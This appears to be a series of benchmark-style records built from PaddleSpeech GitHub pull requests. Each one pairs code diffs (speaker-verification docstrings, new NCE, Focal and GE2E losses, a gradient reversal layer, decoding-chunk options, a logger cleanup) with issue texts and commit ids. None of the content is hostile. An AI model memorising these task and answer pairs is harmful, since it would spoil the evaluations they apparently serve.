logger.info(print_msg) diff --git a/paddlespeech/vector/io/embedding_norm.py b/paddlespeech/vector/io/embedding_norm.py --- a/paddlespeech/vector/io/embedding_norm.py +++ b/paddlespeech/vector/io/embedding_norm.py @@ -57,14 +57,14 @@ def __call__(self, lengths (paddle.Tensor): A batch of tensors containing the relative length of each sentence (e.g, [0.7, 0.9, 1.0]). It is used to avoid computing stats on zero-padded steps. - spk_ids (_type_, optional): tensor containing the ids of each speaker (e.g, [0 10 6]). + spk_ids (paddle.Tensor, optional): tensor containing the ids of each speaker (e.g, [0 10 6]). It is used to perform per-speaker normalization when norm_type='speaker'. Defaults to paddle.to_tensor([], dtype="float32"). Returns: paddle.Tensor: The normalized feature or embedding """ N_batches = x.shape[0] - # print(f"x shape: {x.shape[1]}") + current_means = [] current_stds = [] @@ -75,6 +75,9 @@ def __call__(self, actual_size = paddle.round(lengths[snt_id] * x.shape[1]).astype("int32") # computing actual time data statistics + # we extract the snt_id embedding from the x + # and the target paddle.Tensor will reduce an 0-axis + # so we need unsqueeze operation to recover the all axis current_mean, current_std = self._compute_current_stats( x[snt_id, 0:actual_size, ...].unsqueeze(0)) current_means.append(current_mean)
diff --git a/paddlespeech/vector/exps/ecapa_tdnn/test.py b/paddlespeech/vector/exps/ecapa_tdnn/test.py --- a/paddlespeech/vector/exps/ecapa_tdnn/test.py +++ b/paddlespeech/vector/exps/ecapa_tdnn/test.py @@ -38,10 +38,10 @@ def compute_dataset_embedding(data_loader, model, mean_var_norm_emb, config, """compute the dataset embeddings Args: - data_loader (_type_): _description_ - model (_type_): _description_ - mean_var_norm_emb (_type_): _description_ - config (_type_): _description_ + data_loader (paddle.io.Dataloader): the dataset loader to be compute the embedding + model (paddle.nn.Layer): the speaker verification model + mean_var_norm_emb : compute the embedding mean and std norm + config (yacs.config.CfgNode): the yaml config """ logger.info( f'Computing embeddings on {data_loader.dataset.csv_path} dataset') @@ -65,6 +65,17 @@ def compute_dataset_embedding(data_loader, model, mean_var_norm_emb, config, def compute_verification_scores(id2embedding, train_cohort, config): + """Compute the verification trial scores + + Args: + id2embedding (dict): the utterance embedding + train_cohort (paddle.tensor): the cohort dataset embedding + config (yacs.config.CfgNode): the yaml config + + Returns: + the scores and the trial labels, + 1 refers the target and 0 refers the nontarget in labels + """ labels = [] enroll_ids = [] test_ids = [] @@ -119,20 +130,32 @@ def compute_verification_scores(id2embedding, train_cohort, config): def main(args, config): + """The main process for test the speaker verification model + + Args: + args (argparse.Namespace): the command line args namespace + config (yacs.config.CfgNode): the yaml config + """ + # stage0: set the training device, cpu or gpu + # if set the gpu, paddlespeech will select a gpu according the env CUDA_VISIBLE_DEVICES paddle.set_device(args.device) - # set the random seed, it is a must for multiprocess training + # set the random seed, it is the necessary measures for multiprocess training seed_everything(config.seed) # stage1: build the dnn backbone model network + # we will extract the audio embedding from the backbone model ecapa_tdnn = EcapaTdnn(**config.model) # stage2: build the speaker verification eval instance with backbone model + # because the checkpoint dict name has the SpeakerIdetification prefix + # so we need to create the SpeakerIdetification instance + # but we acutally use the backbone model to extact the audio embedding model = SpeakerIdetification( backbone=ecapa_tdnn, num_class=config.num_speakers) # stage3: load the pre-trained model - # we get the last model from the epoch and save_interval + # generally, we get the last model from the epoch args.load_checkpoint = os.path.abspath( os.path.expanduser(args.load_checkpoint)) @@ -143,7 +166,8 @@ def main(args, config): logger.info(f'Checkpoint loaded from {args.load_checkpoint}') # stage4: construct the enroll and test dataloader - + # Now, wo think the enroll dataset is in the {args.data_dir}/vox/csv/enroll.csv, + # and the test dataset is in the {args.data_dir}/vox/csv/test.csv enroll_dataset = CSVDataset( os.path.join(args.data_dir, "vox/csv/enroll.csv"), feat_type='melspectrogram', @@ -152,14 +176,14 @@ def main(args, config): window_size=config.window_size, hop_length=config.hop_size) enroll_sampler = BatchSampler( - enroll_dataset, batch_size=config.batch_size, - shuffle=False) # Shuffle to make embedding normalization more robust. + enroll_dataset, batch_size=config.batch_size, shuffle=False) enroll_loader = DataLoader(enroll_dataset, batch_sampler=enroll_sampler, collate_fn=lambda x: batch_feature_normalize( x, mean_norm=True, std_norm=False), num_workers=config.num_workers, return_list=True,) + test_dataset = CSVDataset( os.path.join(args.data_dir, "vox/csv/test.csv"), feat_type='melspectrogram', @@ -167,7 +191,6 @@ def main(args, config): n_mels=config.n_mels, window_size=config.window_size, hop_length=config.hop_size) - test_sampler = BatchSampler( test_dataset, batch_size=config.batch_size, shuffle=False) test_loader = DataLoader(test_dataset, @@ -180,16 +203,17 @@ def main(args, config): model.eval() # stage6: global embedding norm to imporve the performance + # and we create the InputNormalization instance to process the embedding mean and std norm logger.info(f"global embedding norm: {config.global_embedding_norm}") - - # stage7: Compute embeddings of audios in enrol and test dataset from model. - if config.global_embedding_norm: mean_var_norm_emb = InputNormalization( norm_type="global", mean_norm=config.embedding_mean_norm, std_norm=config.embedding_std_norm) + # stage 7: score norm need the imposters dataset + # we select the train dataset as the idea imposters dataset + # and we select the config.n_train_snts utterance to as the final imposters dataset if "score_norm" in config: logger.info(f"we will do score norm: {config.score_norm}") train_dataset = CSVDataset( @@ -209,6 +233,7 @@ def main(args, config): num_workers=config.num_workers, return_list=True,) + # stage 8: Compute embeddings of audios in enrol and test dataset from model. id2embedding = {} # Run multi times to make embedding normalization more stable. logger.info("First loop for enroll and test dataset") @@ -225,7 +250,7 @@ def main(args, config): mean_var_norm_emb.save( os.path.join(args.load_checkpoint, "mean_var_norm_emb")) - # stage 8: Compute cosine scores. + # stage 9: Compute cosine scores. train_cohort = None if "score_norm" in config: train_embeddings = {} @@ -234,11 +259,11 @@ def main(args, config): train_embeddings) train_cohort = paddle.stack(list(train_embeddings.values())) - # compute the scores + # stage 10: compute the scores scores, labels = compute_verification_scores(id2embedding, train_cohort, config) - # compute the EER and threshold + # stage 11: compute the EER and threshold scores = paddle.to_tensor(scores) EER, threshold = compute_eer(np.asarray(labels), scores.numpy()) logger.info(
[vec]complete the speaker verification notes and speakers in yaml complete the speaker verification notes and speakers in yaml Now the speakers in conf/ecapa_tdnn.yaml is 1211, but the speakers in vox1&vox2 is 7205
2022-04-12T05:41:17
PaddlePaddle/PaddleSpeech
1,719
PaddlePaddle__PaddleSpeech-1719
[ "1717" ]
880829fe898ff7f6fde6f23d2c27042a3055d781
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py --- a/paddlespeech/vector/modules/loss.py +++ b/paddlespeech/vector/modules/loss.py @@ -91,3 +91,137 @@ def forward(self, outputs, targets, length=None): predictions = F.log_softmax(predictions, axis=1) loss = self.criterion(predictions, targets) / targets.sum() return loss + + +class NCELoss(nn.Layer): + """Noise Contrastive Estimation loss funtion + + Noise Contrastive Estimation (NCE) is an approximation method that is used to + work around the huge computational cost of large softmax layer. + The basic idea is to convert the prediction problem into classification problem + at training stage. It has been proved that these two criterions converges to + the same minimal point as long as noise distribution is close enough to real one. + + NCE bridges the gap between generative models and discriminative models, + rather than simply speedup the softmax layer. + With NCE, you can turn almost anything into posterior with less effort (I think). + + Refs: + NCE:http://www.cs.helsinki.fi/u/ahyvarin/papers/Gutmann10AISTATS.pdf + Thanks: https://github.com/mingen-pan/easy-to-use-NCE-RNN-for-Pytorch/blob/master/nce.py + + Examples: + Q = Q_from_tokens(output_dim) + NCELoss(Q) + """ + + def __init__(self, Q, noise_ratio=100, Z_offset=9.5): + """Noise Contrastive Estimation loss funtion + + Args: + Q (tensor): prior model, uniform or guassian + noise_ratio (int, optional): noise sampling times. Defaults to 100. + Z_offset (float, optional): scale of post processing the score. Defaults to 9.5. + """ + super(NCELoss, self).__init__() + assert type(noise_ratio) is int + self.Q = paddle.to_tensor(Q, stop_gradient=False) + self.N = self.Q.shape[0] + self.K = noise_ratio + self.Z_offset = Z_offset + + def forward(self, output, target): + """Forward inference + + Args: + output (tensor): the model output, which is the input of loss function + """ + output = paddle.reshape(output, [-1, self.N]) + B = output.shape[0] + noise_idx = self.get_noise(B) + idx = self.get_combined_idx(target, noise_idx) + P_target, P_noise = self.get_prob(idx, output, sep_target=True) + Q_target, Q_noise = self.get_Q(idx) + loss = self.nce_loss(P_target, P_noise, Q_noise, Q_target) + return loss.mean() + + def get_Q(self, idx, sep_target=True): + """Get prior model of batchsize data + """ + idx_size = idx.size + prob_model = paddle.to_tensor( + self.Q.numpy()[paddle.reshape(idx, [-1]).numpy()]) + prob_model = paddle.reshape(prob_model, [idx.shape[0], idx.shape[1]]) + if sep_target: + return prob_model[:, 0], prob_model[:, 1:] + else: + return prob_model + + def get_prob(self, idx, scores, sep_target=True): + """Post processing the score of post model(output of nn) of batchsize data + """ + scores = self.get_scores(idx, scores) + scale = paddle.to_tensor([self.Z_offset], dtype='float32') + scores = paddle.add(scores, -scale) + prob = paddle.exp(scores) + if sep_target: + return prob[:, 0], prob[:, 1:] + else: + return prob + + def get_scores(self, idx, scores): + """Get the score of post model(output of nn) of batchsize data + """ + B, N = scores.shape + K = idx.shape[1] + idx_increment = paddle.to_tensor( + N * paddle.reshape(paddle.arange(B), [B, 1]) * paddle.ones([1, K]), + dtype="int64", + stop_gradient=False) + new_idx = idx_increment + idx + new_scores = paddle.index_select( + paddle.reshape(scores, [-1]), paddle.reshape(new_idx, [-1])) + + return paddle.reshape(new_scores, [B, K]) + + def get_noise(self, batch_size, uniform=True): + """Select noise sample + """ + if uniform: + noise = np.random.randint(self.N, size=self.K * batch_size) + else: + noise = np.random.choice( + self.N, self.K * batch_size, replace=True, p=self.Q.data) + noise = paddle.to_tensor(noise, dtype='int64', stop_gradient=False) + noise_idx = paddle.reshape(noise, [batch_size, self.K]) + return noise_idx + + def get_combined_idx(self, target_idx, noise_idx): + """Combined target and noise + """ + target_idx = paddle.reshape(target_idx, [-1, 1]) + return paddle.concat((target_idx, noise_idx), 1) + + def nce_loss(self, prob_model, prob_noise_in_model, prob_noise, + prob_target_in_noise): + """Combined the loss of target and noise + """ + + def safe_log(tensor): + """Safe log + """ + EPSILON = 1e-10 + return paddle.log(EPSILON + tensor) + + model_loss = safe_log(prob_model / + (prob_model + self.K * prob_target_in_noise)) + model_loss = paddle.reshape(model_loss, [-1]) + + noise_loss = paddle.sum( + safe_log((self.K * prob_noise) / + (prob_noise_in_model + self.K * prob_noise)), -1) + noise_loss = paddle.reshape(noise_loss, [-1]) + + loss = -(model_loss + noise_loss) + + return loss diff --git a/paddlespeech/vector/utils/vector_utils.py b/paddlespeech/vector/utils/vector_utils.py --- a/paddlespeech/vector/utils/vector_utils.py +++ b/paddlespeech/vector/utils/vector_utils.py @@ -30,3 +30,11 @@ def get_chunks(seg_dur, audio_id, audio_duration): for i in range(num_chunks) ] return chunk_lst + + +def Q_from_tokens(token_num): + """Get prior model, data from uniform, would support others(guassian) in future + """ + freq = [1] * token_num + Q = paddle.to_tensor(freq, dtype='float64') + return Q / Q.sum()
[vec] support large scale speaker training
2022-04-19T08:31:53
PaddlePaddle/PaddleSpeech
1,722
PaddlePaddle__PaddleSpeech-1722
[ "1721" ]
9382ad8a161c6247b196d9b3ee0259ee05df28d1
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py --- a/paddlespeech/vector/modules/loss.py +++ b/paddlespeech/vector/modules/loss.py @@ -132,7 +132,7 @@ def __init__(self, Q, noise_ratio=100, Z_offset=9.5): def forward(self, output, target): """Forward inference - + Args: output (tensor): the model output, which is the input of loss function """ @@ -161,7 +161,7 @@ def get_prob(self, idx, scores, sep_target=True): """Post processing the score of post model(output of nn) of batchsize data """ scores = self.get_scores(idx, scores) - scale = paddle.to_tensor([self.Z_offset], dtype='float32') + scale = paddle.to_tensor([self.Z_offset], dtype='float64') scores = paddle.add(scores, -scale) prob = paddle.exp(scores) if sep_target: @@ -225,3 +225,65 @@ def safe_log(tensor): loss = -(model_loss + noise_loss) return loss + + +class FocalLoss(nn.Layer): + """This criterion is a implemenation of Focal Loss, which is proposed in + Focal Loss for Dense Object Detection. + + Loss(x, class) = - \alpha (1-softmax(x)[class])^gamma \log(softmax(x)[class]) + + The losses are averaged across observations for each minibatch. + + Args: + alpha(1D Tensor, Variable) : the scalar factor for this criterion + gamma(float, double) : gamma > 0; reduces the relative loss for well-classified examples (p > .5), + putting more focus on hard, misclassified examples + size_average(bool): By default, the losses are averaged over observations for each minibatch. + However, if the field size_average is set to False, the losses are + instead summed for each minibatch. + """ + + def __init__(self, alpha=1, gamma=0, size_average=True, ignore_index=-100): + super(FocalLoss, self).__init__() + self.alpha = alpha + self.gamma = gamma + self.size_average = size_average + self.ce = nn.CrossEntropyLoss( + ignore_index=ignore_index, reduction="none") + + def forward(self, outputs, targets): + """Forword inference. + + Args: + outputs: input tensor + target: target label tensor + """ + ce_loss = self.ce(outputs, targets) + pt = paddle.exp(-ce_loss) + focal_loss = self.alpha * (1 - pt)**self.gamma * ce_loss + if self.size_average: + return focal_loss.mean() + else: + return focal_loss.sum() + + +if __name__ == "__main__": + import numpy as np + from paddlespeech.vector.utils.vector_utils import Q_from_tokens + paddle.set_device("cpu") + + input_data = paddle.uniform([5, 100], dtype="float64") + label_data = np.random.randint(0, 100, size=(5)).astype(np.int64) + + input = paddle.to_tensor(input_data) + label = paddle.to_tensor(label_data) + + loss1 = FocalLoss() + loss = loss1.forward(input, label) + print("loss: %.5f" % (loss)) + + Q = Q_from_tokens(100) + loss2 = NCELoss(Q) + loss = loss2.forward(input, label) + print("loss: %.5f" % (loss)) diff --git a/paddlespeech/vector/utils/vector_utils.py b/paddlespeech/vector/utils/vector_utils.py --- a/paddlespeech/vector/utils/vector_utils.py +++ b/paddlespeech/vector/utils/vector_utils.py @@ -11,6 +11,7 @@ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. +import paddle def get_chunks(seg_dur, audio_id, audio_duration):
[vec] deal with class imbalances
2022-04-20T03:42:57
PaddlePaddle/PaddleSpeech
1,725
PaddlePaddle__PaddleSpeech-1725
[ "1724" ]
bc28386d0c0ea5ccbb290e92af0045184f18065c
diff --git a/paddlespeech/vector/modules/layer.py b/paddlespeech/vector/modules/layer.py new file mode 100644 --- /dev/null +++ b/paddlespeech/vector/modules/layer.py @@ -0,0 +1,76 @@ +# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import paddle +import paddle.nn as nn +from paddle.autograd import PyLayer + + +class GradientReversalFunction(PyLayer): + """Gradient Reversal Layer from: + Unsupervised Domain Adaptation by Backpropagation (Ganin & Lempitsky, 2015) + + Forward pass is the identity function. In the backward pass, + the upstream gradients are multiplied by -lambda (i.e. gradient is reversed) + """ + + @staticmethod + def forward(ctx, x, lambda_=1): + """Forward in networks + """ + ctx.save_for_backward(lambda_) + return x.clone() + + @staticmethod + def backward(ctx, grads): + """Backward in networks + """ + lambda_, = ctx.saved_tensor() + dx = -lambda_ * grads + return dx + + +class GradientReversalLayer(nn.Layer): + """Gradient Reversal Layer from: + Unsupervised Domain Adaptation by Backpropagation (Ganin & Lempitsky, 2015) + + Forward pass is the identity function. In the backward pass, + the upstream gradients are multiplied by -lambda (i.e. gradient is reversed) + """ + + def __init__(self, lambda_=1): + super(GradientReversalLayer, self).__init__() + self.lambda_ = lambda_ + + def forward(self, x): + """Forward in networks + """ + return GradientReversalFunction.apply(x, self.lambda_) + + +if __name__ == "__main__": + paddle.set_device("cpu") + + data = paddle.randn([2, 3], dtype="float64") + data.stop_gradient = False + grl = GradientReversalLayer(1) + out = grl(data) + out.mean().backward() + print(data.grad) + + data = paddle.randn([2, 3], dtype="float64") + data.stop_gradient = False + grl = GradientReversalLayer(-1) + out = grl(data) + out.mean().backward() + print(data.grad)
[vec] add GRL to domain adaptation
2022-04-20T06:47:59
PaddlePaddle/PaddleSpeech
1,731
PaddlePaddle__PaddleSpeech-1731
[ "1730" ]
0186f522af1270f3a559caa1009675c2eafe0a66
diff --git a/paddlespeech/vector/modules/loss.py b/paddlespeech/vector/modules/loss.py --- a/paddlespeech/vector/modules/loss.py +++ b/paddlespeech/vector/modules/loss.py @@ -18,6 +18,7 @@ import paddle import paddle.nn as nn import paddle.nn.functional as F +from paddle.nn import initializer as I class AngularMargin(nn.Layer): @@ -268,22 +269,128 @@ def forward(self, outputs, targets): return focal_loss.sum() +class GE2ELoss(nn.Layer): + """Generalized end-to-end loss which defined in the paper "GENERALIZED END-TO-END LOSS FOR SPEAKER VERIFICATION" + """ + + def __init__(self, init_w=10.0, init_b=-5.0, loss_method="softmax"): + super(GE2ELoss, self).__init__() + self.loss_method = loss_method.lower() + self.w = self.create_parameter( + [1], default_initializer=I.Constant(init_w)) + self.b = self.create_parameter( + [1], default_initializer=I.Constant(init_b)) + assert self.loss_method in ["softmax", "contrast"] + + def get_cossim(self, embeddings_list, centroids): + """Compute cosine similarity for each speaker + """ + cossims = [] + for s_idx, embeddings in enumerate(embeddings_list): + cossim = F.linear(embeddings, centroids.t()) + e_num = len(embeddings) + if embeddings.ndim > 1 and e_num > 1: + expand_centroids = paddle.expand( + centroids[s_idx], shape=[e_num, embeddings.shape[1]]) + new_centroids = (expand_centroids * e_num - embeddings) / ( + e_num - 1) + sims = F.cosine_similarity(embeddings, new_centroids) + cossim[:, s_idx] = sims + cossims.append(self.w * cossim + self.b) + + return cossims + + def cal_softmax_loss(self, cossims): + """Calculate softmax loss + """ + loss = 0.0 + n = 0 + for s_idx, cossim in enumerate(cossims): + loss += -F.log_softmax(cossim, axis=1)[:, s_idx].sum() + n += cossim.shape[0] + + return loss / n + + def cal_contrast_loss(self, cossims): + """Calculate contrast loss + """ + loss = 0.0 + n = 0 + for s_idx, cossim in enumerate(cossims): + cossim = F.sigmoid(cossim) + col_loss = 1. - cossim[:, s_idx] + if len(cossims) > 1: + if s_idx == 0: + excl_centroids_sigmoids = cossim[:, s_idx + 1:] + elif s_idx == (len(cossims) - 1): + excl_centroids_sigmoids = cossim[:, :s_idx] + else: + excl_centroids_sigmoids = paddle.concat( + (cossim[:, :s_idx], cossim[:, s_idx + 1:]), axis=1) + col_loss += paddle.max(excl_centroids_sigmoids, axis=1)[0] + loss += col_loss.sum() + n += cossim.shape[0] + + return loss / n + + def forward(self, output, target): + """Forward inference + + Args: + output: input tensor + target: target label tensor + """ + spkers = paddle.unique(target) + + embeddings_list = [] + for spkid in spkers: + index = (target == spkid).nonzero().reshape([-1]) + embeddings_list.append(output[index]) + # cal centroid + centroids = [] + for embeddings in embeddings_list: + if (embeddings.ndim > 1): + spker_centroid = paddle.mean(embeddings, axis=0) + else: + spker_centroid = embeddings + centroids.append(spker_centroid.clone() / paddle.norm( + spker_centroid, axis=0, keepdim=True)) + centroids = paddle.stack(centroids) + # cal cosine similarity + cossims = self.get_cossim(embeddings_list, centroids) + + # cal loss + if self.loss_method == "softmax": + loss = self.cal_softmax_loss(cossims) + else: + loss = self.cal_contrast_loss(cossims) + + return loss + + if __name__ == "__main__": import numpy as np from paddlespeech.vector.utils.vector_utils import Q_from_tokens paddle.set_device("cpu") - input_data = paddle.uniform([5, 100], dtype="float64") - label_data = np.random.randint(0, 100, size=(5)).astype(np.int64) - + input_data = paddle.uniform([32, 100], dtype="float64") + label_data = np.random.randint(0, 4, size=(32)).astype(np.int64) input = paddle.to_tensor(input_data) label = paddle.to_tensor(label_data) - loss1 = FocalLoss() + loss1 = GE2ELoss(loss_method="softmax") loss = loss1.forward(input, label) - print("loss: %.5f" % (loss)) + print("GE2ELoss softmax-loss: %.5f" % (loss[0])) - Q = Q_from_tokens(100) - loss2 = NCELoss(Q) + loss2 = GE2ELoss(loss_method="contrast") loss = loss2.forward(input, label) - print("loss: %.5f" % (loss)) + print("GE2ELoss contrast-loss: %.5f" % (loss[0])) + + loss3 = FocalLoss() + loss = loss3.forward(input, label) + print("FocalLoss loss: %.5f" % (loss)) + + Q = Q_from_tokens(100) + loss4 = NCELoss(Q) + loss = loss4.forward(input, label) + print("NCELoss loss: %.5f" % (loss))
[vec] support unsupervised learning
2022-04-20T14:41:31
PaddlePaddle/PaddleSpeech
2,016
PaddlePaddle__PaddleSpeech-2016
[ "1969" ]
3a05d0a2c2925b969709e314ee0075572d1c67c7
diff --git a/paddlespeech/cli/asr/infer.py b/paddlespeech/cli/asr/infer.py --- a/paddlespeech/cli/asr/infer.py +++ b/paddlespeech/cli/asr/infer.py @@ -83,6 +83,12 @@ def __init__(self): 'attention_rescoring' ], help='only support transformer and conformer model') + self.parser.add_argument( + '--num_decoding_left_chunks', + '-num_left', + type=str, + default=-1, + help='only support transformer and conformer model') self.parser.add_argument( '--ckpt_path', type=str, @@ -122,6 +128,7 @@ def _init_from_path(self, sample_rate: int=16000, cfg_path: Optional[os.PathLike]=None, decode_method: str='attention_rescoring', + num_decoding_left_chunks: int=-1, ckpt_path: Optional[os.PathLike]=None): """ Init model and other resources from a specific path. @@ -129,6 +136,7 @@ def _init_from_path(self, logger.info("start to init the model") # default max_len: unit:second self.max_len = 50 + assert num_decoding_left_chunks == -1 or num_decoding_left_chunks >= 0 if hasattr(self, 'model'): logger.info('Model had been initialized.') return @@ -179,6 +187,7 @@ def _init_from_path(self, elif "conformer" in model_type or "transformer" in model_type: self.config.decode.decoding_method = decode_method + self.config.num_decoding_left_chunks = num_decoding_left_chunks else: raise Exception("wrong type") @@ -451,6 +460,7 @@ def __call__(self, config: os.PathLike=None, ckpt_path: os.PathLike=None, decode_method: str='attention_rescoring', + num_decoding_left_chunks: int=-1, force_yes: bool=False, rtf: bool=False, device=paddle.get_device()): @@ -460,7 +470,7 @@ def __call__(self, audio_file = os.path.abspath(audio_file) paddle.set_device(device) self._init_from_path(model, lang, sample_rate, config, decode_method, - ckpt_path) + num_decoding_left_chunks, ckpt_path) if not self._check(audio_file, sample_rate, force_yes): sys.exit(-1) if rtf: diff --git a/paddlespeech/server/engine/asr/online/asr_engine.py b/paddlespeech/server/engine/asr/online/asr_engine.py --- a/paddlespeech/server/engine/asr/online/asr_engine.py +++ b/paddlespeech/server/engine/asr/online/asr_engine.py @@ -703,6 +703,7 @@ def _init_from_path(self, sample_rate: int=16000, cfg_path: Optional[os.PathLike]=None, decode_method: str='attention_rescoring', + num_decoding_left_chunks: int=-1, am_predictor_conf: dict=None): """ Init model and other resources from a specific path. @@ -788,7 +789,10 @@ def _init_from_path(self, # update the decoding method if decode_method: self.config.decode.decoding_method = decode_method - + # update num_decoding_left_chunks + if num_decoding_left_chunks: + self.config.decode.num_decoding_left_chunks = num_decoding_left_chunks + assert self.config.decode.num_decoding_left_chunks == -1 or self.config.decode.num_decoding_left_chunks >= 0, f"num_decoding_left_chunks should be -1 or >=0" # we only support ctc_prefix_beam_search and attention_rescoring dedoding method # Generally we set the decoding_method to attention_rescoring if self.config.decode.decoding_method not in [ @@ -862,6 +866,7 @@ def init(self, config: dict) -> bool: sample_rate=self.config.sample_rate, cfg_path=self.config.cfg_path, decode_method=self.config.decode_method, + num_decoding_left_chunks=self.config.num_decoding_left_chunks, am_predictor_conf=self.config.am_predictor_conf): logger.error( "Init the ASR server occurs error, please check the server configuration yaml"
PP-ASR超过15秒识别就越来越慢
原因是目前流式识别的 attention 是关注从开始到当前 chunk 的内容,而 attention 的时间复杂度是 n2d ,n 表示序列长度,所以随着时间推移速度就会变慢 这个我们会排期优化,您也可以看看代码,在合适的位置截断输入,因为可能目前的时刻并不太需要关注太久之前的信息
2022-06-08T02:46:43
PaddlePaddle/PaddleSpeech
2,109
PaddlePaddle__PaddleSpeech-2109
[ "2070" ]
0d91b4975ec632ff4b42ac06e2a68b7cd6aa7fd8
diff --git a/paddlespeech/server/engine/engine_factory.py b/paddlespeech/server/engine/engine_factory.py --- a/paddlespeech/server/engine/engine_factory.py +++ b/paddlespeech/server/engine/engine_factory.py @@ -13,7 +13,7 @@ # limitations under the License. from typing import Text -from ..utils.log import logger +from paddlespeech.cli.log import logger __all__ = ['EngineFactory'] diff --git a/paddlespeech/server/utils/log.py b/paddlespeech/server/utils/log.py deleted file mode 100644 --- a/paddlespeech/server/utils/log.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -import functools -import logging - -__all__ = [ - 'logger', -] - - -class Logger(object): - def __init__(self, name: str=None): - name = 'PaddleSpeech' if not name else name - self.logger = logging.getLogger(name) - - log_config = { - 'DEBUG': 10, - 'INFO': 20, - 'TRAIN': 21, - 'EVAL': 22, - 'WARNING': 30, - 'ERROR': 40, - 'CRITICAL': 50, - 'EXCEPTION': 100, - } - for key, level in log_config.items(): - logging.addLevelName(level, key) - if key == 'EXCEPTION': - self.__dict__[key.lower()] = self.logger.exception - else: - self.__dict__[key.lower()] = functools.partial(self.__call__, - level) - - self.format = logging.Formatter( - fmt='[%(asctime)-15s] [%(levelname)8s] - %(message)s') - - self.handler = logging.StreamHandler() - self.handler.setFormatter(self.format) - - self.logger.addHandler(self.handler) - self.logger.setLevel(logging.DEBUG) - self.logger.propagate = False - - def __call__(self, log_level: str, msg: str): - self.logger.log(log_level, msg) - - -logger = Logger() diff --git a/paddlespeech/server/utils/onnx_infer.py b/paddlespeech/server/utils/onnx_infer.py --- a/paddlespeech/server/utils/onnx_infer.py +++ b/paddlespeech/server/utils/onnx_infer.py @@ -16,7 +16,7 @@ import onnxruntime as ort -from .log import logger +from paddlespeech.cli.log import logger def get_sess(model_path: Optional[os.PathLike]=None, sess_conf: dict=None):
develop 版本 paddlespeech_server 启动后会打印 2 遍 log ```bash paddlespeech_server start --config_file ./conf/application.yaml ``` log: ```text [2022-06-23 06:18:31,311] [ INFO] - start to init the engine [2022-06-23 06:18:31,311] [ INFO] - start to init the engine [2022-06-23 06:18:31,312] [ INFO] - tts : python engine. [2022-06-23 06:18:31,312] [ INFO] - tts : python engine. from .pretrained_models import tts_dynamic_pretrained_models [2022-06-23 06:18:36,330] [ INFO] - File /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4.zip md5 checking... [2022-06-23 06:18:36,330] [ INFO] - File /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4.zip md5 checking... [2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4 [2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4 [2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/default.yaml [2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/default.yaml [2022-06-23 06:18:37,700] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/snapshot_iter_76000.pdz [2022-06-23 06:18:37,700] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/snapshot_iter_76000.pdz [2022-06-23 06:18:37,700] [ INFO] - File /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4.zip md5 checking... [2022-06-23 06:18:37,700] [ INFO] - File /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4.zip md5 checking... [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4 [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4 [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_default.yaml [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_default.yaml [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_snapshot_iter_400000.pdz [2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_snapshot_iter_400000.pdz vocab_size: 268 frontend done! ``` 有问题的 commit 号: ```text 5e03d75 ``` 没问题的 commit 号: ```text 803800 ``` 引起问题的 commit <img width="522" alt="image" src="https://user-images.githubusercontent.com/24568452/175233071-0cf2e8fa-78e0-4497-afa9-584b4b61c3bd.png">
2022-06-30T16:57:08
PaddlePaddle/PaddleSpeech
2,171
PaddlePaddle__PaddleSpeech-2171
[ "2170" ]
5b8673ea4b9a17a393d6f301c27a90ea4e7a33c7
